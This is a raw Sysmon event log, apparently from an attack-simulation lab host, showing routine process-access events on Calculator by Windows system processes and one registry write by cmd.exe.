22:13:28.507{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361993Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.507{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361992Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.491{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361991Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.491{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361990Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.491{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361989Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.491{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361988Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.475{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361987Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.475{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361986Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.475{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\system32\twinui.pcshell.dll+22359|C:\Windows\system32\twinui.pcshell.dll+20684|C:\Windows\system32\twinui.pcshell.dll+ff1f|C:\Windows\system32\twinui.pcshell.dll+c179b|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed 10341000x8000000000000000361985Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.475{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\system32\twinui.pcshell.dll+22359|C:\Windows\system32\twinui.pcshell.dll+20684|C:\Windows\system32\twinui.pcshell.dll+ff1f|C:\Windows\system32\twinui.pcshell.dll+c179b|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b 10341000x8000000000000000361984Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.475{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361983Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.475{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361982Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.475{8e433fbf-2a45-6013-2700-000000001100}162411036C:\Windows\System32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1d60|c:\windows\system32\themeservice.dll+1595|c:\windows\system32\themeservice.dll+1461|c:\windows\system32\themeservice.dll+1886|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361981Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.475{8e433fbf-2a45-6013-2700-000000001100}16242136C:\Windows\System32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1a9a|c:\windows\system32\themeservice.dll+1736|c:\windows\system32\themeservice.dll+6026|c:\windows\system32\themeservice.dll+ad9a|c:\windows\system32\themeservice.dll+9dcf|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361980Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.475{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361979Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.475{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361978Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.460{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361977Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.460{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361976Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.460{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\combase.dll+a3e41|C:\Windows\System32\combase.dll+a3fc6 10341000x8000000000000000361975Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.460{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361974Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.460{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 13241300x8000000000000000361973Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:13:28.460{8e433fbf-3708-6013-b703-000000001100}6088C:\Windows\system32\cmd.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data 10341000x8000000000000000361972Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.460{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361971Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.460{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361970Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.460{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361969Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.460{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361968Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.444{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361967Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.444{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 